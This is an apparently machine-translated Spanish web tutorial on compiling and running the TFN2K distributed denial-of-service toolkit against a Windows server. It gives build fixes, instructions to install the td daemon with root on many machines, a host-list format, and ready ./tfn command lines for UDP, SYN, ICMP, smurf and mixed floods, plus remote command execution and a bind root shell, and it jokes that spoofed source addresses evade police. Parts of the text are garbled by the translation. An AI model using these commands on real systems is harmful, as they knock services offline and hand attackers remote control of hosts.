Linux DDOS ataque en el sistema de Windows

  

Primero que todo, el método de configuración del cliente y el servidor que usamos para atacar, usando el REDHAT LINUX más famoso para las pruebas, usé FEDORA CORE3 para esta prueba de ataque, el software usa el DDOS más famoso.

Primero que todo, el método de configuración del cliente y el servidor que usamos para atacar, usando el REDHAT LINUX más famoso para las pruebas, usé FEDORA CORE3 para esta prueba de ataque, el software usa el DDOS más famoso .

No digas tonterías, comienza a configurar el servidor.

Desempaquetando tar -zxvf tfn2k.tgz

1. Instalando TFN2K

TFN2K es un software de código abierto, por lo que necesitamos compilarlo. No hace falta decir que esto debe compilarse. Todo va a ser, pero hay algunos lugares que deben tenerse en cuenta, porque las diferentes versiones y proveedores de Linux requieren configuraciones diferentes.

Primero modifique src /ip.h

Comente las siguientes secciones, de lo contrario la compilación fallará.

/* struct in_addr

{

unsigned long int s_addr;

}; * /

Luego compile

Al compilar, se te pedirá que ingreses al servidor para establecer la contraseña en 8-32 dígitos.
(Debes ingresar la contraseña al atacar). Después de compilar, aparecerán dos nuevos archivos ejecutables, td y tfn. td es el demonio y también el cliente. El proceso de uso de la máquina. Y tfn es el proceso de control del servidor. Si desea atacar a otros, primero debe iniciar el proceso de td y luego ejecutar el proceso del servidor. De lo contrario, el ataque no es válido. Puede cambiar la contraseña y ejecutar mkpass para cambiarla. Finalmente, instale y ejecute td (requiere permiso ROOT) en todos los clientes y cree un archivo de texto en el servidor. Todas las direcciones IP de los clientes se registran en el archivo (es posible editar uno con VI) en el formato:

192.168.0.1

192.168.0.2

192.168.0.3

IP

IP

… … < Br>

Luego ejecútalo en el servidor principal. /Tfn

II. Attack

./tfn Ingresa directamente, puedes ver algunos parámetros, no se espera que los buenos amigos en inglés me usen Se habló más sobre :)

Formato./tfn < Parámetros >

Parámetros inutilizables No mencionamos, usamos

-f para este ataque El nombre del archivo de texto que se acaba de escribir es el ataque DDOS real, no el ataque DOS

-h DOS, que es un ataque uno a uno independiente seguido de un host o una dirección IP

-p Especifique un puerto más tarde, no hace falta decirlo

-c Los parámetros más críticos, un total de 11 fases

0: detenga el ataque, use el buen

1 - Configuración de nivel de suplantación de identidad, porque la herramienta TFN envía un paquete con la dirección de origen en el momento del ataque, pero la dirección de origen es aleatoria, es decir, la dirección no es autosuficiente, así que no se preocupe por la policía. Jaja

2 - Adaptación del tamaño de paquete del paquete: el ICMP /8 predeterminado, smurf, udp attack por defecto es el paquete más pequeño. Puede aumentar su tamaño cambiando el byte de la carga útil de cada paquete.

3 - Enlace el shell raíz: inicie un servicio de sesión, luego puede obtener un shell raíz conectándose a un puerto específico.

4 - UDP Flood Attack: este ataque explota el hecho de que cada paquete udp se envía a un puerto cerrado, de modo que se devuelve un mensaje ICMP inalcanzable, lo que aumenta la capacidad del ataque.

5 - SYN Flood Attack: este ataque envía regularmente solicitudes de conexión falsas. El resultado será la denegación de servicio del puerto de destino, agregando una tabla de conexión TCP, aumentando el potencial de ataque mediante la respuesta TCP /RST al host no existente, que es un ataque estándar de denegación de servicio.

6 - Ataque de respuesta ICMP (ping): Este ataque envía una solicitud de ping para una dirección falsa y el host de destino devolverá un paquete de respuesta del mismo tamaño.

7 - Ataque SMURF: envíe una solicitud de ping con la dirección del host de destino para transmitir la expansión, de modo que el host de destino reciba una respuesta varias veces.

8 - MIX attack: envía paquetes udp, syn, icmp alternativamente de acuerdo a la relación 1: 1: 1, para que puedas lidiar con enrutadores, otros dispositivos de reenvío de paquetes, NIDS, sniffers, etc., y bombardear bombardeos :) Br>

9 - TARGA3 Attack

10 - Ejecución del comando remoto, este parámetro es una función adicional de TFN. De hecho, los ataques TFN no son solo DOS, sino también el control remoto, como:

./tfn -f hostext -c 10 -i " mkdir /root /edison " Crea edison en el directorio raíz en todos los HOST, seguido del comando " comando "

Básicamente, el siguiente ataque

./tfn -f hostext -c 4 -i www.xxx.com

Use el host registrado en el archivo hostext para realizar ataques UDP en el servidor 163 (todos El proceso td debe iniciarse en el host)

./tfn -f hostext -c 5 -i www.xxx.com -p 80

Use el host registrado en el archivo hostext para realizar el servidor 163. TCP ataque de denegación de servicio (80 ataques WEB, no hace falta decirlo)

./tfn -f hostext -c 6 -i www.xxx.com

Grabación en el archivo hostext El host realiza un ataque ICMP en el servidor 163 (el ataque PING, el desbordamiento del búfer se bloquea inmediatamente)

./tfn -f hostext -c 8 -i www.xxx.com

Grabación en el archivo hostext El host realiza un ataque redondo ICMP &TCP &UDP en el servidor 163 (si la otra parte es un sniffer, debe llorar)

./tfn -f hostext -c 0

Deje que el host deje de atacar < Br>

Básicamente, finalmente, hable acerca de los resultados de mi prueba

Ataque uno a uno, modo de ataque Modo de conexión TCP local CPU local 13% El uso de CPU del servidor atacado es superior al 70% y fluctúa de vez en cuando

Ataque de dos a uno, modo de ataque Modo de conexión TCP local independiente local 13% Uso de CPU del servidor atacado 100%

Ataque de cinco a uno, modo de ataque Modo de conexión TCP Local local independiente CPU13 % El servidor al que se ataca se bloquea. Solo tengo 6 máquinas en mi casa, pero si hay más, docenas de máquinas, el servidor personal promedio morirá definitivamente.

Ataque uno a uno, modo de ataque Conexión ICMP CPU local local 18% atacó la tasa de uso de la CPU del servidor de 96% o más, Fluctúa de vez en tiempo de dos a un ataque, ataque ICMP conexión local de locales aisladas CPU18% el servidor atacado era incapaz de acceso, casi imposible de usar, en menos de media hora de la muerte. Al parecer, el poder no es pequeña.

Copyright © Conocimiento de Windows All Rights Reserved